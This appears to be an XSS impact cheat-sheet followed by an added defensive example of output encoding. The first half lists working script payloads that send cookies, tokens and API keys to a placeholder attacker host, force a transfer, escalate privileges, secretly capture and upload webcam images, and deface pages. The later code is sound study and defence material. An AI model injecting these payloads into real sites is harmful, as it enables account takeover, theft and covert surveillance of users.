- Cookie stealing
<script> fetch(`https://[ATTACKER-DOMAIN]/?cookie=${document.cookie}`) </script>
- Token stealing
<script> fetch(`https://[ATTACKER-DOMAIN]/?token=${localStorage.getItem("token")}`) </script>
- API key stealing
<script> fetch('/myinfo') .then(response => response.json()) .then(data => { return fetch(`https://[ATTACKER-DOMAIN]/?api_key=${data.api_key}`) }) </script>
The risk grows when XSS is combined with vulnerabilities such as CSRF. (The impact varies depending on the purpose or function of the service.)
- Making a transfer
<script> initiateTransaction("attacker_account",1000) </script>
- Privilege escalation
<script> fetch('https://[ATTACKER-DOMAIN]/change-role', { method: 'POST', body: "user_id=1234&role=admin" }) </script>
Browser-provided APIs can be exploited to access OS features (e.g., the Media Stream API or the Clipboard API).
- Camera access
<script> document.addEventListener('DOMContentLoaded', async () => { const v = document.createElement('video'); v.autoplay = true; v.style.display = 'none'; document.body.appendChild(v); const c = document.createElement('canvas'); c.style.display = 'none'; document.body.appendChild(c); const s = await navigator.mediaDevices.getUserMedia({ video: true }); v.srcObject = s; setTimeout(() => { const ctx = c.getContext('2d'); c.width = v.videoWidth; c.height = v.videoHeight; ctx.drawImage(v, 0, 0); c.toBlob(b => { const f = new FormData(); f.append('image', b, 'photo.png'); fetch('http://[]/', { method: 'POST', body: f }); }, 'image/png'); }, 1000); }); </script>
- Defacement
<script> document.body.innerHTML = ` <div style="position:fixed; top:0; left:0; width:100%; height:100%; background-color:black; display:flex; align-items:center; justify-content:center; color:red; font-size:3em; font-family:sans-serif; z-index:10000;"> You've been hacked </div> `; </script>
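Every impact on this page, from cookie theft to defacement, starts with untrusted input reaching the page as markup. The following is an added example, not code from this cheat-sheet, of the root-cause fix: contextual output encoding at render time, so the browser treats user-supplied values as text. The `html` tagged template, the `renderComment` view and the `UNTRUSTED_SAMPLES` inputs are constructed for the example; the sample strings mirror the script-tag shapes listed above, and `attacker.example` is a placeholder.

```javascript
// Added example (not code from the cheat-sheet above): contextual output
// encoding, the fix that removes the root cause of every impact listed here.
// Untrusted values are escaped at render time so the browser treats them as
// text, never as markup. Sample inputs below are constructed.

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "`": "&#x60;",
};

// Escape for HTML text and double-quoted attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (c) => HTML_ESCAPES[c]);
}

// Tagged template: the literal parts are developer-controlled and trusted,
// every interpolated value is escaped before it is joined in.
function html(strings, ...values) {
  return strings.reduce(
    (out, chunk, i) => out + chunk + (i < values.length ? escapeHtml(values[i]) : ""),
    ""
  );
}

// A view that renders user-supplied content.
function renderComment(author, body) {
  return html`<p class="comment"><b>${author}</b>: ${body}</p>`;
}

// Constructed untrusted inputs in the shape of the payloads on this page
// (single-quoted so the ${...} stays literal inside the sample string).
const UNTRUSTED_SAMPLES = [
  '<script>fetch("https://attacker.example/?cookie=" + document.cookie)</script>',
  '<script>initiateTransaction("attacker_account",1000)</script>',
  '"><script>document.body.innerHTML = "You\'ve been hacked"</script>',
];

// True when the rendered HTML still contains a raw <script tag.
function rendersRawScript(rendered) {
  return /<script/i.test(rendered);
}

// One boolean per sample: did the payload survive encoding as markup?
function checkAll() {
  return UNTRUSTED_SAMPLES.map((s) => rendersRawScript(renderComment("guest", s)));
}

for (const s of UNTRUSTED_SAMPLES) console.log(renderComment("guest", s));
console.log(checkAll()); // [ false, false, false ]
```

Encoding is context-specific: the escaper above is correct for HTML text and quoted attributes, but values placed into JavaScript, URLs or CSS need their own encoders. On the client side, the defacement payload works because `innerHTML` parses its argument as markup; writing user data with `textContent` or building nodes with DOM APIs avoids that sink entirely, and the CSP from the earlier example remains the backstop for anything the encoder misses.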